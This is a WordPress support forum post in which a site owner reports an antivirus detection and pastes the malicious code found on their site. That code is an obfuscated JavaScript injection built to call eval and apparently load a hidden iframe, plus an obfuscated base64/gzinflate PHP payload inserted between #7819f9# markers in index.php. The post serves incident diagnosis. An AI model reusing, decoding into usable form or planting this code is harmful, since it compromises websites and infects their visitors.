Virus?

  • Uzma

    (@uzma)


    14 years, 7 months ago

    Hello,
    I can’t seem to visit my site for the past couple of days. I kept getting the following message whenever I went on the site:

    HEUR:Trojan.Script.Generic detected.

    I contacted KasperSky, the anti-virus I use and this is what they sent me back:

    This is not a false alarm, this site is infected.

    Here is the malicious code:
    <script>v=document.createTextNode(‘asd’);var s;for(i in v)if(i==’childNodes’)y=v[i].length+1;y*=2;aa=document.createTextNode(“e”+”v”+”a”+”l”);e=window[aa.nodeValue];e(String.fromCharCode(11-y,11-y,107-y,104-y,34-y,42-y,102-y,113-y,101-y,119-y,111-y,103-y,112-y,118-y,48-y,105-y,103-y,118-y,71-y,110-y,103-y,111-y,103-y,112-y,118-y,117-y,68-y,123-y,86-y,99-y,105-y,80-y,99-y,111-y,103-y,42-y,41-y,100-y,113-y,102-y,123-y,41-y,43-y,93-y,50-y,95-y,43-y,125-y,11-y,11-y,11-y,107-y,104-y,116-y,99-y,111-y,103-y,116-y,42-y,43-y,61-y,11-y,11-y,127-y,34-y,103-y,110-y,117-y,103-y,34-y,125-y,11-y,11-y,11-y,102-y,113-y,101-y,119-y,111-y,103-y,112-y,118-y,48-y,121-y,116-y,107-y,118-y,103-y,42-y,36-y,62-y,107-y,104-y,116-y,99-y,111-y,103-y,34-y,117-y,116-y,101-y,63-y,41-y,106-y,118-y,118-y,114-y,60-y,49-y,49-y,99-y,119-y,118-y,113-y,47-y,117-y,101-y,106-y,99-y,102-y,103-y,48-y,102-y,103-y,49-y,117-y,103-y,107-y,118-y,103-y,54-y,48-y,106-y,118-y,111-y,41-y,34-y,121-y,107-y,102-y,118-y,106-y,63-y,41-y,51-y,50-y,41-y,34-y,106-y,103-y,107-y,105-y,106-y,118-y,63-y,41-y,51-y,50-y,41-y,34-y,117-y,118-y,123-y,110-y,103-y,63-y,41-y,120-y,107-y,117-y,107-y,100-y,107-y,110-y,107-y,118-y,123-y,60-y,106-y,107-y,102-y,102-y,103-y,112-y,61-y,114-y,113-y,117-y,107-y,118-y,107-y,113-y,112-y,60-y,99-y,100-y,117-y,113-y,110-y,119-y,118-y,103-y,61-y,110-y,103-y,104-y,118-y,60-y,50-y,61-y,118-y,113-y,114-y,60-y,50-y,61-y,41-y,64-y,62-y,49-y,107-y,104-y,116-y,99-y,111-y,103-y,64-y,36-y,43-y,61-y,11-y,11-y,127-y,11-y,11-y,104-y,119-y,112-y,101-y,118-y,107-y,113-y,112-y,34-y,107-y,104-y,116-y,99-y,111-y,103-y,116-y,42-y,43-y,125-y,11-y,11-y,11-y,120-y

    If you are a webmaster, please remove the above code from the page.

    It doesn’t tell me which page, I have no idea where to look for this code to remove. Can anyone help?

    I also just noticed that my index file’s code is as follows:

    <?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

#7819f9#
echo(gzinflate(base64_decode("3VfBbqMwEP2VKJeEbZvFxhgQZS+972VXe6l6sAJpkFJYEUo3f7/YY/DIkISk1UrbQ0Zge55nnmeeyf1+XeW/629Nkpbr15esqFfrKhN19jP7U38v02y5EPt04cSNqGb7eFNWy3yWF7PGyTfLPEkW622+S+XC/cI5JM1j/rTaZcVzvb0h8eFLQmMhjkLPs/nNvGl/ov3t5k6cJW95kZZvj0KsinbFL7F7zZ7ibPmjrvLiebWpypeHragepDchd4dbMG6gLGutJw2j6l1Z4qlnWBwpCz5qnMCaUDqFathHk3IkAE8XDY/7EyKj4OqRysmQtyaKetTQ7d8RhIqVwbuLAqY9jppk8imSxlcwfjdGqN/zMMoIIXxsXxiG3eU7txBo0LHZrXf7JGEEJse3v4Z6SvqwdPzAq6HJk3OcTksQwoN4Naic5J7hm6PDAyt9uEyURZ3RwBFapSACRIeB0+dNTeChPRBZPA6T9ZlxxDGSLnRNPT5qVIjKx+Tpk65qkC/g4v115Zv9ziAQFDX1rCZBLFMX5Rig/fC4a/OgELmLQkVpIjahjHTxMlN1eCfNSoBmaYeuzwvVNsHVHlknwwdqoEsw7AAVTXpZiPDYcIHih7OupqEwzhe28lCtcLxxcS8ylAlFHTnOii6Pi/VjXAgo0jxu0Hul5qZTr5NrrBme2cuc2GT9xkJ8NnujydyQzEK7s6EsgoHMcLsNBoWGohlIGGzOP4GOnWLwiLLou+IdomJfACeVBXr0iggvFaM+qgsV6foAj4iYUX33XfAD8ZsO/IHNc/KOtBrJuub+UXtPuIknx/kRn2H/1RdwaACZsTgyBcMju911OtT8W2CnLlTHie+/6v9KfwE=")));
#/7819f9#
?>

    I have no idea what these codes are and I didn’t think this chunk of code was there before but I’m not positive. Can anyone decode and let me know what it is? Is this what the virus code might be?

    Please help.

    Thank you.

Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Virus?’ is closed to new replies.